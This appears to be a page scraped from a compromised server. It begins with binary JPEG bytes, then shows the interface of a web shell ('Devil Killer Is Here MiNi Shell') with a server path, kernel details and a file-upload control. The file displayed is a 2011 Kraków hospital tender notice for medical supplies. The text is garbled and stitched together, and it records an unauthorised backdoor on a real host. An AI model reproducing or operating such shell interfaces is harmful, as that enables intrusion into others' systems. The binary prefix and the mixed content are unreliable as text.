JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/443456-N-2011.html

<p class="kh_header"><b>Kraków: Dostawa  wyrobów medycznych  - według  11 pakietów</b><br>
<b>Numer ogłoszenia: 443456 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. Ludwika Rydygiera w Krakowie spółka z ograniczoną odpowiedzialnością , os. Złotej Jesieni 1, 31-826 Kraków, woj. małopolskie, tel. 12 64 68 502, faks 12 64 68 930.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rydygierkrakow.pl/umowy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szpital spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  wyrobów medycznych  - według  11 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa wyrobów medycznych  według 11 pakietów, zgodnie z opisem i wymaganiami zawartymi w załączniku nr 1 do niniejszej specyfikacji.
/ kod CPV:  33141200-2, 33169000-2, 33171200-1, 33171110-3/
2.	Opis części zamówienia: 
a) dopuszcza się składanie ofert częściowych, gdzie część stanowią poszczególne pakiety  od 1 do 10, dodatkowo w pakiecie 11 dopuszcza się składanie ofert na poszczególne pozycje asortymentowe od poz. 1 do poz. 12.
b) zastrzega się częściowy wybór ofert gdzie część stanowią pakiety od 1 do 10, oraz pakiet 11 od poz.1 do poz. 12.
c) oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w załączniku nr 1 do specyfikacji dla poszczególnego pakietu lub pozycji asortymentowej zostaną odrzucone;
3.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych. 
4.	Termin ważności przedmiotu zamówienia: nie może być krótszy niż 12 miesięcy od daty dostawy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.16.90.00-2, 33.17.12.00-1, 33.17.11.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności polegających na dostawie materiałów szewnych do szpitala, jeżeli przepisy prawa nakładają obowiązek ich posiadania spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że posiada wiedzę i doświadczenie - 
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia; z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (minimum 1 dostawa) oraz dokumenty potwierdzające, że te dostawa została wykonana lub jest wykonywana należycie (minimum 1 dokument) 
Wykonawca w celu spełnienia powyższego warunku zobowiązany jest wykazać 1 zrealizowaną dostawy wyrobów medycznych do szpitala, przy czym każda  z nich  na kwotę  brutto nie mniejszą niż:
PAKIET 1	           4 000,-zł
PAKIET 2	           4 000,-zł
PAKIET 3	         10 000,- zł
PAKIET 4	           3 500,- zł
PAKIET 5	           6 000,-zł
PAKIET 6	           3 500,-zł
PAKIET 7	         65 000,-zł
PAKIET 8	             100,- zł
PAKIET 9	         60 000,- zł
PAKIET 10	150 000,-zł
PAKIET 11	
 poz. 1 	           2 500,- zł
 poz. 2 	          10 000,-zł
 poz. 3 	           1 000,-zł
 poz. 4 	           2 000,-zł
 poz. 5	              300,-zł
 poz. 6 	           1 500,-zł
 poz. 7 	           1 500,-zł
 poz. 8 	           5 000,-zł
 poz. 9                 100,-zł
 poz. 10 	           1 200,-zł
 poz. 11	           2 500,-zł
 poz. 12	3 000,-zł
                                                                                                                     
W przypadku złożenia oferty na więcej niż jeden pakiet lub pozycję asortymentową wartość wykazanych dostaw musi odpowiadać sumie wartości pakietów (zgodnie z powyższym), na które Wykonawca złoży ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że dysponuje potencjałem technicznym  zdolnym do wykonania przedmiotowego zamówienia spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że dysponuje  osobami zdolnymi do wykonania przedmiotowego zamówienia spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Odbiorca przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie :          
-     numeru katalogowego produktu,
-	nazwy produktu przy zachowaniu jego parametrów,
-	przedmiotowym (produkt zamienny),
-	ilościowym (zmiany ilości poszczególnego asortymentu w ramach ilości ujętych w umowie),
-	sposobu konfekcjonowania,
-	wystąpienia przejściowego braku produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową.
Powyższe zmiany nie mogą skutkować zwiększeniem ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Odbiorcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rydygierkrakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiajacego Kraków, os. Złotej Jesieni 1 w Sekcji Zamówień Publicznych pokój 15 b II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2012 godzina 10:00, miejsce: Dziennik Podawczy w siedzibie Zamawiającego pokój 238.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sterylne ostrza wymienne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylne ostrza wymienne brzuszaste ze stali nierdzewnej lub węglowej-opak.100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Korek z końcówką LOCK z membraną silikonową do wstrzyknięć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 7 500 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opaska sterylna Esmarcha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szer.10-11cm x 2,7-3 m - 100 szt
szer.15-16cm x 2,7-3 m - 140 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dren sterylny z tworzywa sztucznego lub silikonu typu Kehr
Dren Penrose sterylny z tworzywa sztucznego powleczony silikonem lub z silikonu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ch14,Ch16,Ch18 - 20 szt
15-19mmx30cm - 300 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przyrząd jałowy  do przetaczania płynów do pompy Volumat Agila.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 800 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 1. Przyrząd jałowy do przetaczania leków światłoczułych ,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. komora kroplowa o dł.min.6cm ,filtr 15 um,regulator przepływu z miejscem do podwieszenia drenu ,dren dł.150 cm z silikonową wstawka na jego końcu umożliwiającą szybką dodatkową iniekcję leku.Jednorazowy.Bez lateksu. - 200 szt
2. komora kroplowa o dł.min.6cm ,filtr 15 um,regulator przepływu z miejscem do podwieszenia drenu z dodatkowym portem do iniekcji w kszztałcie Y.Jednorazowy.Bez lateksu. - 240 szt
3. Przyrząd jałowy do precyzyjnego przetaczania leków światłoczułych ,
komora kroplowa o dł.min.6cm ,filtr 15 um,regulator przepływu z miejscem do podwieszenia drenu .Precyzyjny regulator przepływu jest w kształcie beczki z regulacja w zakresie5-250ml/godz.,dren dł.150cm z obrotowym łącznikiem Luer-Lock na jego końcu oraz dodatkowym portem do iniekcji w kształcie Y.Jednorazowy,wolny od DEHP - 300 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kompres niejałowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompres niejałowy z 13-17 nitkowej gazy ,8 warstwowy  pakowany po 100szt.	10 cm x 10 cm	450 op.
 	7,5 cm x 7,5 cm	3000 op.
 	5 cm x 5 cm	6500op.
Kompres jałowy z 17-nitkowej gazy z niestrzępiacymi brzegami ,8 warstwowy .	7,5 cm x 7,5 cm	1600 op.
pakowany po 40 szt.	 	 
Kompres jałowy włókninowy 4-warstwowy po 2 szt.*	10 cm x 10 cm	18500 op.
Kompres jałowy włókninowy 4-warstwowy po 10 szt.*	10 cm x 10 cm	1000 op.
Kompres jałowy włókninowy 4-warstwowy po 2 szt.*	7,5 cm x 7,5 cm	50000 op.
Kompres jałowy włókninowy 4-warstwowy po 2 szt.*	5 cm x 5 cm	80000 op.
Seton  jałowy z gazy 17-nitkowej	5 cm x 2 m	2500 szt.
Seton  jałowy z gazy 17-nitkowej	2 cm x 1 m	300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zgłębnik do żywienia dożołądkowego dla noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgłębnik do żywienia dożołądkowego dla noworodków ze znacznikiem RTG z otworami  bocznymi , zakończenie zaokrąglone i zamknięte ,zatyczka końcowa zapobiegająca refluksowi	6 Fr i 8,9Fr dł.40 cm	100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zestaw serwet do operacji stawu biodrowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw serwet do operacji stawu biodrowego.	 	 
Skład:	 	 
1 serweta operacyjna samoprzylepna z wycięciem U,rozm.220cmx280cm z	 	 
dodatkową warstwą chłonną w obrębie pola operac.	 	 
1 serweta operacyjna samoprzylepna 180 cmx 310 cm	Dopuszczalna tolerancja 	 
1 serweta operacyjna 150 cm x 150 cm	rozmiarów +/-10%	300 zestawów  
1 serweta operacyjna 80cm x 100 cm	 	 
1 serweta na stolik instrumentariuszki 150cmx200 cm	 	 
1 serweta na stolik Mayo o wym.85x145 cm	 	 
Osłona na kończynę dolną 35cmx120 cm	 	 
2 przylepce taśmowe min.10x50 cm	 	 
4 ręczniki z celulozy o rozm. min.30x30 cm	 	 
Zestaw serwet do operacji  kończyn i artroskopii kolana	 	 
Skład:	 	 
1 serweta operac. z samouszczelniającym sie otworem 7-6x7-8 cm oraz 	 	 
uchwytem typu rzep rozm. 220 cmx 330 cm z dodatkową warstwą chłonną	 	 
w obrębie pola operac.	Dopuszczalna tolerancja 	 
1 serweta operac.160 cm x160 cm	rozmiarów +/-10%	1000 zestawów  
1 serweta na stolik instrumentariuszki 150cmx200 cm	 	 
1 serweta na stolik Mayo o wym.85x145 cm	 	 
Osłona na kończynę 30cmx 90 cm	 	 
2 przylepce taśmowe min.10 cm x 50 cm	 	 
2 ręczniki z celulozy w rozm.30x30 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Serweta operacyjna jałowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta operacyjna jałowa z 17 nitk. gazy 4 warstw.z nitką Rtg i tasiemką	45 x 45 cm po 2 szt.	15000
(dopuszczalny ubytek rozmiaru max. 5 % oraz min. 1 etykieta TAG)	 	opak.
Serweta operacyjna jałowa z 17 nitk. gazy 4 warstw.z nitką Rtg i tasiemką	45 x 45 cm po 5 szt.	15000
(dopuszczalny ubytek rozmiaru max. 5 % oraz min. 1 etykieta TAG)	 	opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
